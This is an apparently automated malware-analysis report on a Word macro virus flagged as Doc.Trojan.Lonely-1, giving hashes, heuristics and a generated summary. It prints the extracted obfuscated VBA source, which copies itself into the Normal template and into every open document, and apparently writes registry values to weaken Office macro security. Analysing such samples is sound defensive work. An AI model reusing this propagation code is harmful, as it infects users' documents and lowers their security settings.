Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1f1f416e62e54907…

MALICIOUS

Office (OLE)

46.5 KB Created: 2003-08-15 18:28:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 28227cd66ad3a67a965e7ca39e3cf86e SHA-1: 97763dcad3cb0877ead6d2f2102d9f9c77669003 SHA-256: 1f1f416e62e549075632bad56dcfcc2f30b1bfdaf32295edb9c7d8c9d301aeb8
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Lonely-1'. It contains VBA macros that appear to be obfuscated and designed to hide or modify code, indicated by the 'LoneLy' comment and the use of random-like functions. The primary function of the macro seems to be to embed and potentially execute further malicious code, although the exact payload delivery mechanism is obscured.

Heuristics 3

  • ClamAV: Doc.Trojan.Lonely-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lonely-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15724 bytes
SHA-256: 5861a57fca2f92fd51c42d7500904bd547c0003db0476eddcb2942a681747e98
Detection
ClamAV: Doc.Trojan.Lonely-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
'LoneLy
Private Sub Document_Close()
On Error Resume Next
Retro
Stealth
With ThisDocument _
.VBProject _
.VBComponents(VBA.Int((VBA.Rnd * 0) + 1)) _
.CodeModule
Ourcode = .lines(VBA.Int((VBA.Rnd * 0) + 1), _
 .CountOfLines)
End With
VBSBackup Ourcode
With Normal _
.ThisDocument _
.VBProject _
.VBComponents(VBA.Int((VBA.Rnd * 0) + 1)) _
.CodeModule
    If .lines(VBA.Int((VBA.Rnd * 0) + 1), VBA.Int((VBA.Rnd * 0) + 1)) <> VBA.Chr(39) & VBA.Chr(76) & VBA.Chr(111) & VBA.Chr(110) & VBA.Chr(101) & VBA.Chr(76) & VBA.Chr(121) Then
        .DeleteLines _
        VBA.Int((VBA.Rnd * 0) + 1), _
        .CountOfLines
        .AddFromstring _
        Ourcode
    End If
End With
For i = 1 To Documents _
.Count
With Documents(i) _
.VBProject _
.VBComponents(VBA.Int((VBA.Rnd * 0) + 1)) _
.CodeModule
    Documents(i).ReadOnlyRecommended = VBA.Int(VBA.Rnd * 0)
    If Documents(i).Saved = VBA.Int(VBA.Rnd * 0) Then
    If .lines(VBA.Int((VBA.Rnd * 0) + 1), VBA.Int((VBA.Rnd * 0) + 1)) <> VBA.Chr(39) & VBA.Chr(76) & VBA.Chr(111) & VBA.Chr(110) & VBA.Chr(101) & VBA.Chr(76) & VBA.Chr(121) Then
        .DeleteLines _
        VBA.Int((VBA.Rnd * 0) + 1), _
        .CountOfLines
        .AddFromstring _
        Ourcode
    End If
    End If
End With
Next
End Sub

Private Function Decomp(a)
On Error Resume Next
For i = 1 To Len(a)
P = Mid(a, i, VBA.Int((VBA.Rnd * 0) + 1))
If P = VBA.Chr(72) Then P = VBA.Chr(72) & VBA.Chr(75) & VBA.Chr(69) & VBA.Chr(89) & VBA.Chr(95) & VBA.Chr(67) & VBA.Chr(85) & VBA.Chr(82) & VBA.Chr(82) & VBA.Chr(69) & VBA.Chr(78) & VBA.Chr(84) & VBA.Chr(95) & VBA.Chr(85) & VBA.Chr(83) & VBA.Chr(69) & VBA.Chr(82)
If P = VBA.Chr(83) Then P = VBA.Chr(83) & VBA.Chr(111) & VBA.Chr(102) & VBA.Chr(116) & VBA.Chr(119) & VBA.Chr(97) & VBA.Chr(114) & VBA.Chr(101)
If P = VBA.Chr(77) Then P = VBA.Chr(77) & VBA.Chr(105) & VBA.Chr(99) & VBA.Chr(114) & VBA.Chr(111) & VBA.Chr(115) & VBA.Chr(111) & VBA.Chr(102) & VBA.Chr(116)
If P = VBA.Chr(79) Then P = VBA.Chr(79) & VBA.Chr(102) & VBA.Chr(102) & VBA.Chr(105) & VBA.Chr(99) & VBA.Chr(101)
If P = VBA.Chr(50) Then P = VBA.Chr(57) & VBA.Chr(46) & VBA.Chr(48)
If P = VBA.Chr(88) Then P = VBA.Chr(49) & VBA.Chr(48) & VBA.Chr(46) & VBA.Chr(48)
If P = VBA.Chr(87) Then P = VBA.Chr(87) & VBA.Chr(111) & VBA.Chr(114) & VBA.Chr(100)
If P = VBA.Chr(81) Then P = VBA.Chr(83) & VBA.Chr(101) & VBA.Chr(99) & VBA.Chr(117) & VBA.Chr(114) & VBA.Chr(105) & VBA.Chr(116) & VBA.Chr(121)
If P = VBA.Chr(76) Then P = VBA.Chr(76) & VBA.Chr(101) & VBA.Chr(118) & VBA.Chr(101) & VBA.Chr(108)
If P = VBA.Chr(65) Then P = VBA.Chr(65) & VBA.Chr(99) & VBA.Chr(99) & VBA.Chr(101) & VBA.Chr(115) & VBA.Chr(115) & VBA.Chr(86) & VBA.Chr(66) & VBA.Chr(79) & VBA.Chr(77)
If P = VBA.Chr(84) Then P = VBA.Chr(84) & VBA.Chr(111) & VBA.Chr(111) & VBA.Chr(108) & VBA.Chr(115)
If P = VBA.Chr(49) Then P = VBA.Chr(77) & VBA.Chr(97) & VBA.Chr(99) & VBA.Chr(114) & VBA.Chr(111)
If P = VBA.Chr(51) Then P = VBA.Chr(87) & VBA.Chr(105) & VBA.Chr(110) & VBA.Chr(100) & VBA.Chr(105) & VBA.Chr(114)
If P = VBA.Chr(52) Then P = VBA.Chr(92) & VBA.Chr(108) & VBA.Chr(111) & VBA.Chr(110) & VBA.Chr(101) & VBA.Chr(108) & VBA.Chr(121) & VBA.Chr(46)
Decomp = Decomp & P
Next
End Function

Private Sub VBSBackup(Ourcode)
On Error Resume Next
System.PrivateProfileString("", Decomp(VBA.Chr(72) & VBA.Chr(92) & VBA.Chr(83) & VBA.Chr(92) & VBA.Chr(77) & VBA.Chr(92) & VBA.Chr(87) & VBA.Chr(105) & VBA.Chr(110) & VBA.Chr(100) & VBA.Chr(111) & VBA.Chr(119) & VBA.Chr(115) & VBA.Chr(92) & VBA.Chr(67) & VBA.Chr(117) & VBA.Chr(114) & VBA.Chr(114) & VBA.Chr(101) & VBA.Chr(110) & VBA.Chr(116) & VBA.Chr(118) & VBA.Chr(101) & VBA.Chr(114) & VBA.Chr(115) & VBA.Chr(105) & VBA.Chr(111) & VBA.Chr(110) & VBA.Chr(92) & VBA.
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.